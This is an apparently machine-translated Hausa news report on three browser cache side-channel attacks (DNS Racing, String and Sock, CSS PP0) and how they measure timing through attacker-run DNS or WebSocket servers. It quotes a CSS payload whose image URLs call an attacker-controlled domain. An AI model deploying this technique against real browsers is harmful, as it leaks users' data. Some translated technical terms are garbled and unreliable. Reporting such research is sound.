Tawagar masu bincike daga jami'o'in Amurka da Isra'ila da Australia da dama sun kirkiro hare-hare guda uku wadanda ke gudana akan masu binciken gidan yanar gizo don fitar da bayanai game da abubuwan da ke cikin na'urar sarrafa bayanai. Hanya ɗaya tana aiki a cikin masu bincike ba tare da JavaScript ba, sauran biyun kuma suna ketare hanyoyin kariya daga hare-haren tashoshi na gefe, gami da waɗanda ake amfani da su a cikin burauzar Tor da DeterFox. An buga lambar don nuna hare-haren, da kuma abubuwan haɗin uwar garken da suka dace don hare-haren, akan GitHub.
Don bincika abubuwan da ke cikin cache, duk hare-hare suna amfani da hanyar Prime + Probe, wanda ya haɗa da cika cache tare da daidaitattun ƙima da gano canje-canje ta hanyar auna lokacin isa gare su lokacin cika su. Don ƙetare hanyoyin tsaro da ke cikin masu bincike waɗanda ke tsoma baki tare da ingantacciyar ma'aunin lokaci, a cikin zaɓuɓɓuka biyu, ana yin roko zuwa uwar garken DNS ko WebSocket wanda maharin ke sarrafawa, wanda ke adana tarihin lokacin buƙatun da aka karɓa. A cikin nau'i ɗaya, ana amfani da ƙayyadadden lokacin mayar da martani na DNS azaman ma'anar lokaci.
Ma'aunai da aka yi ta amfani da sabar DNS na waje ko WebSocket, ta amfani da tsarin rarrabuwar kawuna dangane da koyon injin, sun wadatar don hasashen ƙima tare da daidaiton har zuwa 98% a cikin mafi kyawun yanayin (matsakaicin 80-90%). An gwada hanyoyin kai harin akan dandamali na kayan masarufi daban-daban (Intel, AMD Ryzen, Apple M1, Samsung Exynos) kuma an tabbatar da su na duniya ne.
Bambancin farko na harin Racing na DNS yana amfani da ingantaccen aiwatar da hanyar Prime+Probe ta amfani da tsararrun JavaScript. Bambance-bambancen sun taso ne zuwa yin amfani da na'urar mai ƙididdigewa ta DNS na waje da mai sarrafa ta'addanci, wanda ke haifar da lokacin yunƙurin loda hoto daga yankin da ba ya wanzu. Mai ƙidayar lokaci na waje yana ba da damar kai hari na Prime+Probe akan masu bincike waɗanda ke iyakance ko hana gabaɗayan samun damar masu ƙidayar lokaci na JavaScript.
Domin uwar garken DNS da ke kan hanyar sadarwar Ethernet guda ɗaya, ana ƙididdige daidaiton mai ƙididdigewa ya kai kusan 2 ms, wanda ya isa ya kai harin tashoshi na gefe (don kwatanta, daidaiton daidaitaccen lokacin JavaScript a cikin Tor Browser shine. rage zuwa 100 ms). Don harin, ba a buƙatar kulawa da uwar garken DNS, tun lokacin da aka zaɓi lokacin aiwatar da aikin don lokacin amsawa daga DNS ya zama alamar kammala rajistan a baya (dangane da ko an kunna mai sarrafa ta'addanci). a baya ko kuma daga baya, an yanke shawara game da saurin aikin bincike tare da cache) .
Hanya na biyu na harin, "String and Sock", yana da nufin ƙetare dabarun tsaro waɗanda ke hana ƙananan amfani da tsararru a cikin JavaScript. Maimakon tsararru, String da Sock suna amfani da ayyuka akan manyan igiyoyi, girman wanda aka zaɓa domin mai canzawa ya rufe duka cache na LLC (cache matakin ƙarshe). Na gaba, ta yin amfani da aikin indexOf (), ana bincika ƙananan igiyoyi a cikin kirtani, wanda ba shi da farko a cikin kirtani, watau. aikin bincike yana haifar da maimaitawa a kan gaba dayan kirtani. Tunda girman layin yayi daidai da girman cache na LLC, dubawa yana ba ku damar yin aikin duba cache ba tare da sarrafa tsararru ba. Don auna jinkiri, maimakon DNS, ana yin kira zuwa uwar garken WebSocket wanda maharin ke sarrafa - kafin da kuma bayan an gama aikin bincike, ana aika tambayoyi a cikin layin, wanda uwar garken ke ƙididdige jinkirin da aka yi amfani da shi don tantance cache. abun ciki.
Bambancin na uku na harin "CSS PP0" ana aiwatar da shi ta hanyar HTML da CSS, kuma yana iya aiki a cikin masu bincike tare da nakasassu na JavaScript. Hanyar tana kama da "String and Sock", amma ba a haɗa shi da JavaScript ba. A yayin harin, an samar da jerin masu zaɓen CSS waɗanda abin rufe fuska. Babban babban kirtani na farko wanda ya cika cache an saita shi ta ƙirƙirar alamar div tare da babban sunan aji. A ciki akwai saitin wasu divs masu gano nasu. Kowane ɗayan waɗannan divs ɗin gida yana da nasa salon tare da zaɓin da ke neman ƙaramin igiya. Lokacin yin shafi, mai binciken yana fara ƙoƙarin sarrafa divs na ciki, wanda ke haifar da aikin bincike akan babban layi. Ana yin binciken ne ta amfani da abin rufe fuska da aka ɓace da gangan kuma yana haifar da jujjuyawar gabaɗayan layin, bayan haka yanayin “ba” yana haifar da yunƙurin ɗaukar hoto na baya yana nunin wuraren bazuwar: #pp:not([class*=’xjtoxg’]) #s0 {background-image: url(«https://qdlvibmr.helldomain.oy.ne.ro»);} #pp:not([class*=’gzstxf’]) #s1 {background-image: url(«https://licfsdju.helldomain.oy.ne.ro»);} … X X ...
Sabar DNS na maharin yana aiki da ƙananan yanki, wanda zai iya auna jinkirin karɓar buƙatun. Sabar DNS tana fitar da NXDOMAIN don duk buƙatun kuma yana adana tarihin ainihin lokacin buƙatun. Sakamakon sarrafa saitin divs, uwar garken DNS na maharin yana karɓar jerin buƙatun, jinkirin da ke tsakanin wanda ya dace da sakamakon bincika abubuwan da ke cikin cache.
source: budenet.ru